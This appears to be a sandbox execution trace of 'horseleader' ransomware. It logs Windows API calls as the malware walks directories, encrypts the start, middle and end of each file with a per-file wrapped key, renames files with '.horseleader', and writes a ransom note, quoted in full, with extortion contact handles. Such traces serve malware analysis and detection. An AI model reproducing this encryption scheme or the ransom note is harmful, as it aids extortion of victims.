1 [0173.096] CloseHandle (hObject=0x158) returned 1 [0175.474] GetProcessHeap () returned 0x780000 [0175.474] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0175.474] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.horseleader") returned 97 [0175.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: 
"c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.horseleader")) returned 1 [0175.476] GetProcessHeap () returned 0x780000 [0175.476] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0175.476] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e5c7f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd7200, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0175.476] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0175.476] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 85 [0175.477] StrStrIW (lpFirst="Proof.msi", lpSrch=".horseleader") returned 0x0 [0175.477] lstrcmpW (lpString1="Proof.msi", lpString2="#Decrypt#.txt") returned 1 [0175.477] lstrcmpW (lpString1="Proof.msi", lpString2="_uninstalling_.png") returned 1 [0175.477] lstrlenW (lpString=".testttjffg") returned 11 [0175.477] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi", lpSrch=".testttjffg") returned 0x0 [0175.477] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0175.477] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, 
pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0175.477] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0175.478] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 85 [0175.478] StrStrW (lpFirst="Proof.msi", lpSrch=".txt") returned 0x0 [0175.478] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=881152) returned 1 [0175.478] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.478] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0176.018] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.018] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0176.019] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x69100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.019] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0180.790] 
SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.791] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0180.792] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xd2200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.792] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0181.102] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0181.102] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0181.103] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.103] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0181.104] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0181.104] CloseHandle (hObject=0x158) returned 1 [0181.466] GetProcessHeap () returned 0x780000 [0181.466] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 
[0181.466] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.horseleader") returned 97 [0181.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.horseleader")) returned 1 [0181.471] GetProcessHeap () returned 0x780000 [0181.471] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0181.471] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0181.472] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0181.472] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0181.472] StrStrIW (lpFirst="Proof.xml", lpSrch=".horseleader") returned 0x0 [0181.472] lstrcmpW (lpString1="Proof.xml", lpString2="#Decrypt#.txt") returned 1 [0181.472] lstrcmpW (lpString1="Proof.xml", lpString2="_uninstalling_.png") returned 1 [0181.472] lstrlenW (lpString=".testttjffg") returned 11 [0181.472] StrStrW 
(lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpSrch=".testttjffg") returned 0x0 [0181.472] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0181.473] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0181.473] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0181.473] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0181.473] StrStrW (lpFirst="Proof.xml", lpSrch=".txt") returned 0x0 [0181.474] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1457) returned 1 [0181.474] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5b1, lpOverlapped=0x0) returned 1 [0181.561] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0181.562] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5b1, lpOverlapped=0x0) returned 1 [0181.562] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.562] WriteFile (in: hFile=0x158, 
lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0181.562] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0181.562] CloseHandle (hObject=0x158) returned 1 [0181.565] GetProcessHeap () returned 0x780000 [0181.565] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0181.565] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.horseleader") returned 97 [0181.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.horseleader")) returned 1 [0181.571] GetProcessHeap () returned 0x780000 [0181.571] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0181.571] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.xml", cAlternateFileName="")) returned 0 
[0181.572] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0181.572] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\#Decrypt#.txt") returned 89 [0181.572] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0181.572] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0181.572] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0181.574] lstrlenA (lpString="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") returned 1368 [0181.574] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0181.574] CloseHandle (hObject=0x21c) returned 1 [0181.575] GetProcessHeap () returned 0x780000 [0181.575] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0181.575] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0181.575] lstrcmpiW (lpString1="Proof.fr", lpString2="Windows") returned -1 [0181.575] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr") returned 75 [0181.575] lstrcmpW (lpString1="Proof.fr", lpString2=".") returned 1 [0181.575] lstrcmpW (lpString1="Proof.fr", lpString2="..") returned 1 
[0181.575] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0181.575] GetProcessHeap () returned 0x780000 [0181.576] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0181.576] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*") returned 77 [0181.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0181.576] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0181.576] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\.") returned 77 [0181.576] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0181.577] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="..", cAlternateFileName="")) returned 1 [0181.577] lstrcmpiW (lpString1="..", 
lpString2="Windows") returned -1 [0181.577] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\..") returned 78 [0181.577] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0181.577] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0181.577] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0181.577] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0181.577] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 85 [0181.577] StrStrIW (lpFirst="Proof.cab", lpSrch=".horseleader") returned 0x0 [0181.577] lstrcmpW (lpString1="Proof.cab", lpString2="#Decrypt#.txt") returned 1 [0181.577] lstrcmpW (lpString1="Proof.cab", lpString2="_uninstalling_.png") returned 1 [0181.578] lstrlenW (lpString=".testttjffg") returned 11 [0181.578] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", lpSrch=".testttjffg") returned 0x0 [0181.578] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0181.578] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0181.578] CreateFileW 
(lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0181.578] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 85 [0181.579] StrStrW (lpFirst="Proof.cab", lpSrch=".txt") returned 0x0 [0181.579] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=21064532) returned 1 [0181.579] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.579] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0182.165] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0182.165] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0182.166] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xa08daa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.166] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0182.172] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0182.172] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0182.173] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1411b54, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.173] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0182.181] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0182.181] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0182.182] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.182] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0182.183] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0182.183] CloseHandle (hObject=0x158) returned 1 [0187.909] GetProcessHeap () returned 0x780000 [0187.909] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0187.910] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
